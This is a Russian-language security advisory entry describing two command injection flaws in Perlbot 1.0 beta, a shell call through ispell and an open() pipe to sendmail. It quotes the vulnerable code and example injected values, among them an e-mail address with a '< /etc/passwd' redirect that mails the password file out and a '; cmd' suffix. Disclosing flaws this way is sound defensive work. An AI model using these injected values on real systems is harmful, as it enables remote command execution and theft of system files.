| Дата публикации: | 21.10.2002 |
| Всего просмотров: | 1256 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | В программе Perlbot (www.perlbot.com) обнаружено 2 уязвимости: 1. Из-за недостаточной фильтрации ввода пользователя, Perlbot сценарий может использоваться для выполнения произвольных команд, с привилегиями Web сервера. Проблема находится в следующем коде: foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`) Команды могут задаваться следующим образом: `cmd`, $(cmd) или \xxx, где xxx – восьмеричное значение любого символа. 2. Из-за недостаточной фильтрации и неправильного вызова open(), когда сценарий пытается послать электронное сообщение, можно выполнить произвольные команды. Проблема находится в следующем коде: open (MAIL,"| $sendmail $recipient") || die $!; E-mail адрес, типа hacker@scan-associates.net < /etc/passwd позволяет читать произвольные файлы на системе пользователя. E-mail адрес, hacker@scan-associates.net ; cmd – позволяет выполнять произвольные команды. Уязвимость обнаружена в Perlbot 1.0 beta |
| Ссылки: | SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution |